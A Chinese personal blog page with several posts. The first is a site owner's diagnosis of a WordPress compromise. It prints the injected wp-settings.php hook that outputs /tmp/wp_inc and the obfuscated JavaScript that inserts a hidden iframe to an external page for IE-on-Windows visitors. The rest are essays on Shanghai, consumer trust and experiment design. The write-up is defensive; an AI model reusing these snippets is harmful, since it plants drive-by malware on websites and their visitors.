Categories
Wordpress

wordpress之手动查木马侵入

最近两个blog都不消停,总有木马嵌入的报告。是可忍孰不可忍,在今早收到google Webmaster的通知之后,决定彻底的查一下这个感染的原因。

登上FTP,看到wp-settings.php这个文件更新日期和其他的都不一样,就下下他来。然后和标准的安装包自带的wp-settings.php进行比对,果然发现多了这么几行:
function check_wordpress(){
$t_d = sys_get_temp_dir();
if(file_exists($t_d . '/wp_inc')){
readfile($t_d . '/wp_inc');
}
}
add_action('wp_head', 'check_wordpress');

遂加了一行echo $t_d. '/wp_inc' ;,华丽丽的发现输出了一个/tmp。这个时候访问blog并查看源文件,发现有一行代码被嵌入:
35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('i 9(){a=6.h('b');7(!a){5 0=6.j('k');6.g.l(0);0.n='b';0.4.d='8';0.4.c='8';0.4.e='f';0.m='w://z.o.B/C.D?t=E'}}5 2=A.x.q();7(((2.3("p")!=-1&&2.3("r")==-1&&2.3("s")==-1))&&2.3("v")!=-1){5 t=u("9()",y)}',41,41,'el||ua|indexOf|style|var|document|if|1px|MakeFrameEx|element|yahoo_api|height|width|display|none|body|getElementById|function|createElement|iframe|appendChild|src|id|nl|msie|toLowerCase|opera|webtv||setTimeout|windows|http|userAgent|1000|hggf|navigator|ai|showthread|php|72241732'.split('|'),0,{})) // ]]>
这就是一切祸首的来源!

总结一下,这个木马的入侵模式为:修改wp-settings.php文件,然后调用系统临时文件夹/tmp下的wp_inc文件,然后嵌入到网站的里面,实现JS入侵

最简单的屏蔽办法自然是覆盖wp-settings.php文件,然后这行代码的嵌入果然消失了,网站也就没问题了。然而最大的问题则是,服务器已经被感染了,他会不断的重写wp-settings.php文件,而且就算我把文件的权限设为600(只读)而不是644也无济于事。这下子,我也不知道应该怎么办了……看了一下google的report,貌似整个服务器上有很多网站都中招了,汗。

Of the 168165 site(s) we tested on this network over the past 90 days, 4491 site(s) served content that resulted in malicious software being downloaded and installed without user consent.

莫非要换服务器了?……又是一年搬家时?
p.s. 发现自己向着下列目标在不懈努力:

上得了厅堂,下得了厨房,写得了代码,查得出异常,杀得了木马,翻得了围墙,开得起好车,买得起新房,斗得过二奶,打得过流氓.

Categories
我的生活状态

雨雾飞扬

天晴总是不久的,南方多少要和阴雨濛濛连在一起。于是,上海便又被稀稀落落的雨水覆盖了。

有的时候在感慨,上海这座城市,太缺乏绿色了。到处都是水泥钢筋的现代感,偶尔有些绿色也是被高高的栅栏围在里面,走在路上只能无奈的窥视。公园是有的,但是好少。或许不公平,但这个时候我总是在怀念巴塞罗那的绿茵。尤其是在学校大大的Mac机房+书吧里面,向窗外望去一片绿树灿烂的感觉。

DSCN0051

窗外的天气阴沉,心里也就阴阴沉沉的。从成都回来之后,开始不停的看论文、看论文,一是感觉上几个月没有好好的看论文,陌生了;二是也想知道现在大家都在关注一些什么。或许看论文也越来越挑剔了,总是在试图找一下文章中是不是有unique的观点和新的想法,而很多文章都是一如既往的没营养。最后,或许还想保持一点数学的sense吧,免得日后连个公式推导都不会了,那就太凄惨了。

DSCN0021

有的时候,也在感慨没有时间再去那么细细的逛博物馆了。不知道为什么,无论上海博物馆还是四川博物馆,都让我有一种“苍老”的感觉。记得巴塞的博物馆都似乎很年轻的。

Categories
事儿关经济

底线

有的时候怀疑自己是不是还有一点点底线,很多事情越来越习惯于容忍和接受。前几天在slides中还在意气昂扬的讲随机分组的重要性云云,现在就开始各种妥协了。毕竟,不可能拿学术界的标准来衡量一切的事情,哪怕这个标准再基本不过、可谓学术论文必须遵守的底线。

想想其实也不足为奇。新闻报道到处都是可以拿来当作GRE AW论文素材的东西,经不住最基本的逻辑批判,那么还谈什么其他的商业报告?当所有的人都在商业报告里面搅混水的时候,默默遵守规则恐怕只是一种一厢情愿的清高了。有的时候,必然的,底线也就是一降、再降。不管心里多么痛苦、多么无奈。

一个不讲究逻辑和科学性的大环境。

Categories
互联网产业观察 经济、IT观察与思考

不一样的亚马逊和Amazon

我这篇文章倒不是想给Amazon做什么宣传,而只是借机说一下最近的一些最简单的购物经历,顺便感慨一下制度、诚信的缺失。

可能在国内被各种卖家欺骗惯了,尤其是在淘宝早年的时候,购物一般都是额外的小心的。只是前几天还是不小心上了一次当。要做学历认证嘛,要翻译件嘛,还不能自己翻译,就找了一家很近的翻译公司做这个事情,价格也不便宜,但是想着事情那么多还是花钱买时间吧,于是就爽快的付了翻译费。然后翻译件拿到了,跑到认证地点去,人家却说这个翻译件不符合要求^#%#。无奈啊,只能又掏钱去做一次翻译,哗哗的人民币流出去还是觉得心疼的,毕竟自己赚的钱知道赚钱的辛苦之处啊。而后自然不甘心,去找第一家翻译公司,百般推卸责任,后来直接粗鲁的视而不见。我也没有太多的时间跟他们耗着,于是315打个电话,又想到当时是用的信用卡所以也找到了信用卡发卡行,毕竟国外的信用卡消费还都是有保障的,可以在服务不到位、商家诚信有问题的时候通过银行交涉退款什么的。

315自然是两边打个电话说了一遍,然后就一副事不关己高高挂起,把皮球踢给其他部门。呃,也罢,本来也没指着消费者权益被他们保护。信用卡发卡行自然是态度好的多,一路绿灯帮我调单之类的,但是最后也很无奈,通过银联的交易他们也没有办法退款什么的,只能按照我的投诉做一个不良记录,但商家还是建行那边的,他们也只能反映给银联。这个,也罢了,维权成本这么高的情况下我也犯不着发什么律师信之类的。权当花钱买教训了。

也许是在欧洲太习惯了人们之间默认的诚信,没有什么怀疑的。同时,这几天同样发生在我身上的另一件事则让我觉得实在是太过于鲜明的对比了。8月份的时候在Amazon买了两本英文书,当时怕丢选的还是稍贵一点的运输方式,本来说是预计9月底能寄到,结果现在都还没有收到。忍不住,就给Amazon发了个Email,看看能不能有什么音信,至少能给我个包裹号码之类的跟踪一下嘛。结果很快Amazon就给我回邮件了,还主动的退还了25刀的运费到我的信用卡里面!信中各种抱歉、还说一个月之后再没有收到就可以帮我重新寄或者退款之类的。我只是昨天忍不住小小的抱怨一下嘛,连电话都懒的打,没想到态度居然这么好!

其实倒也不意外,联想到7月份的时候换新Kindle的百般顺利,当时就对Amazon刮目相看。当我爸妈看到我几个电话就很快的拿到一个全新的kindle的时候,那种惊讶啊!是啊,在国内买个东西要是想退货,那难免和销售人员口水交涉一番。哪有Amazon这种顾客为上的服务态度。

除了态度之外,背后更多的是一些诚信问题。还是说美国好了,一系列的诚信体制让每个人、公司都知道违反诚信的高昂代价。信用卡的核心是信用,而不是国内理解的“透支”功能,否则不过是一张简单的贷记卡而已。其实我对招商银行的印象蛮好的,信用卡一直用的很舒服,但是客服也跟我很无奈的承认在国内信用卡机制的不健全和跟国外的差距,我们也只能容忍和谅解。我只是百无聊赖的抱怨了一句,信用卡的信用评分什么的对我们持卡人有这么全面严格的要求,却对商户没什么要求,真的是不公平啊!

联想到最近淘宝商城热热闹闹的“起义”活动,我就觉得真的是不能不涉及诚信体制的问题了。这东西,本科的第一篇论文就论及与此,没想到现在还在这么热热闹闹的上演。我从来都是支持淘宝提高进入门槛的,这才有利于过滤掉一些竞争力不足、打诚信擦边球的商家(虽然相比于完美市场会有效率损失,但这正是信息不对称下我们为信息付出的成本)。很多人不敢去淘宝买东西,我就说一句很简单的,去淘宝商城嘛!至少,不会有什么太多的假货。当然,商城本身的其他问题就不多说了,也难怪最近这么大力的整合凡客等垂直B2C网站。现在,淘宝已经拿自己的顾客资源来卖钱了,可见这么多年的市场培育还是有价值的。

只是,太多太多事情折射出来的都是背后的诚信体制的缺失:人们习惯了有空子就钻、有便宜不占白不占。如果说中国经济增长未来有什么大的阻力,我觉得诚信体制可以算是一个。良好的诚信体制有利于市场资源科学合理的流动,而诚信体制的缺失只会让这个市场越来越“柠檬”,资源的配置被扭曲、买卖双方的交易成本被大幅增加。虽然诚信体制对于越小的经济活动越关键,但是不积小流、无以成江河,底层微观经济活动诚信的缺失,必然可期宏观层面的更多问题。

至于为什么我说“亚马逊”不是Amazon,大家可以搜搜最近卓越亚马逊的新闻,貌似也有诚信危机啊!果然,什么国际公司到了中国都是难免“常在河边走,哪有不湿鞋”?

不过,至于华尔街,那就另当别论吧。少数聪明人认为自己可以玩转地球,自然有童话破灭的时候。

Categories
事儿关经济 经济、IT观察与思考

社会实验的特殊性(三)

在上一篇[cref %e7%a4%be%e4%bc%9a%e5%ae%9e%e9%aa%8c%e7%9a%84%e7%89%b9%e6%ae%8a%e6%80%a7%ef%bc%88%e4%ba%8c%ef%bc%89]里面回顾了费歇尔的实验设计三原则之后,那么归根结底,我们为什么要做实验?

从一个纯经济学的角度来看,社会实验的目的之一就是在我们面对现有的数据受到各种局限、从而无法完美的回答我们关心的问题的时候(说到底还是各种内生性问题),采取的一种主动出击寻求答案的方式。故而,实验之前我们一般是有一个基本的思路和方向的,然后更多的想去看一下这个东西到底是不是在现实中就是这个样子。从这个角度而言,社会实验是在很明确的我们知道想得到什么信息的方向上去设计的。

说一下从我个人的感觉上的最大的在业界和在学术界的不同,可能就是data上。在学术界,难得会有非常好的data,所以很多的时候我们都是在有限的数据资源的基础上、去力求用最完美的方法估计我们感兴趣的值。数据源有限的原因有些是历史上的,比如我们研究几十年前的事情,自然当时没有电脑等东西可以完善的记录所有的事情;有些是数据本身的性质决定的,比如宏观里面常用的gdp等东西,中国的数据是1978年之后才有的,而且一般都是年度数据,更受限于国民统计汇总的层级汇报,自然会有一些测量偏差;有些是业界有数据,但是没法得到,这里就牵扯到一些隐私等法律权益、或者数据接口API等开放的幅度的问题;还有些是知道数据在哪里、也可以得到,但是成本太高,比如个人层面的数据,除了全民普查外很难有全覆盖的数据,一般只是小规模样本;最后的就是信息并不是直接以数字的方式记录的,比如twitter上面的用户微博记录,因此需要借助文本挖掘等手段进一步深究。

业界主要提供的就是第三类,大量的个人用户的数据,比如淘宝上各种买卖双方交易的数据。现在淘宝的交易量真的是非常大,而且每笔交易都是真实的现金往来的(我们不考虑非法的洗钱状况),其实背后对应的就是一个真实的微观交易的集合。但是这个交易数据怎么用?最简单的,我们可以看价格,对于同质品之间竞争已然白热化的,已然相差无几,那么价格几乎就等同于scanner price,可以用来衡量物价的波动。当然,网络交易有不同于实体交易的地方,比如受限于运输成本和采购的规模效应,肯定会和超市里的价格有所区别。另一方面,网络上的价格信息流动非常充分,越来越接近于理想中的完全竞争市场对于信息的要求,所以多少也让人兴奋。

另外一个有趣的数据可能就是微博,因为其实质上是一种“短平快”的信息传播渠道,会把信息通过简单的几个信息源极快的扩散到整个网络中去(所谓的influencer model)。所以现在很多人炒得很热的微博营销也是背后有着深刻的渊源的。但是同样的,信息传输成本降低的背后就是噪音的增加,因此对于微博的信息分析起来除了文本挖掘技术实现之外,就是怎么去在大量的噪音数据中寻找到有用的信息。从这个角度而言,就是在进行任何文本挖掘或者信息提取之前,是不是有一个主导的思路去明确的知道需要挖掘的信息。业界很多时候不是数据太少了,而是太多了,以至于大家根本不知道这些数据可以怎么用,所以data mining成为了救命稻草,一窝蜂的上去看看能不能挖到金矿。从我的角度看,每一个data mining算法背后必然是有一种主导的思想来支撑的,比如决策树,不过是分类统计最优化路径的感觉,这样的直觉还是蛮强的。所有数据分析的任务无外乎两个字:降维,怎么在一个多维的好烦的数据海中找到自己最感兴趣的数据,可能是几个变量之间的关系,可能是一个综合指标的创建。最简单的,GDP就是对于国民生产消费活动的降维衡量指标,所以他既然降维了自然有损失,能够多么真切的反应经济活动的现实就必然要打个折扣。

经济学里面常用的“降维”的方法就是回归,无论回归在统计学或者其他学科里面被批判的多么体无完肤,但是回归最大的好处在我看来就是最容易融入经济学直觉。在[cref %e5%b0%8f%e7%aa%a5%e2%80%9c%e9%ab%98%e7%bb%b4%e6%95%b0%e6%8d%ae%e9%99%8d%e7%bb%b4%e2%80%9d-2]里面我曾经提到一些最新的高维数据降维的算法,然而算法本身必然是有直觉甚至是(经济)理论来支撑的。当数据挖掘方法被应用在一个经济活动或者经济问题的时候,如果完全脱离了经济直觉和经济思维衍生的分析方法,我觉得未免有点太过于高傲了。有的时候,如果分析思路足够敏锐,那么基于这样思路的各种算法的出来的结果可能是殊途同归。正所谓“万变不离其宗”,这也是我觉得很多data mining的方法应该和经济学、商科的思维更好的融合在一起的缘故。就像挖矿,我们除了要有先进的挖掘机以外,事前的各种勘探和经验思路还是有非常大的价值的,至少可以降低找到金矿位置的成本、尤其是时间成本。这也是我觉得经济学在业界的应用天地断然不仅仅限于和金融相关的那些而已的缘故。

另外,如果“降维”说的广义一点,就是科学的目标。可能不同的人对科学有不同的定义,我除了喜欢一种“概率”角度的定义之外,刚看到一种定义也是蛮受启发的,

The object of science is the discovery of relations.., of which the complex may be deduced from the simple. John Pringle Nichol, 1840

然而,说到底,经济直觉总要来源于实践经验,只要经济学还是定位于“研究人类行为活动的科学”。实践中信息不足的时候,信息是制约的瓶颈,因此我们要借助更多的数学建模工具来力求完美精细的刻画现有的数据构成的轮廓。反之,如果数据是可选择的,那么更多的精力就应该放在如何去“选择”数据上。我认为,实验最大的好处就是数据完全是由实验设计阶段决定的,实验设计的好数据自然会更好的告诉我们所关心的答案。

忘了是哪位大牛在Handbook of Econometrics里面写的了,大意是“与其寻求更好的估计方法,不如寻找更高质量的数据”,言下之意就是在数据可以被“设计”而获得的情况下,我们可以把精力更多的放在实验设计而不是估计模型的选择上。我并不是一个纯粹的reduced form鼓吹者,相反,我是更欣赏structural model后面的经济学思维的。因此,在实验的方法被付诸实践之前,我更希望更多的按照一种经济学model的模式去考量这些问题,去更精巧的让实验告诉我们想知道的答案。除了社会实验的特殊性考量之外,必然的,我们没有任何理由抛弃现有的经济理论、尤其是微观经济理论去完全随意的“检查”几个变量之间的实验上的因果关系。且不论efficiency,社会实验的对象为参与经济活动的人、这一特质决定了我们在设计实验的时候便要充分利用现有对于人类行为的认识成果,更好的一步步设计实验的流程——可能不只是一次实验的流程,更多的是一环扣一环的一个个实验如何按部就班进行下去。一个动态的实验设计会更好的考量实验设计者对于经济学的理解,也是社会实验较之于费歇尔三原则下的自然科学实验、要求更高的方面之一。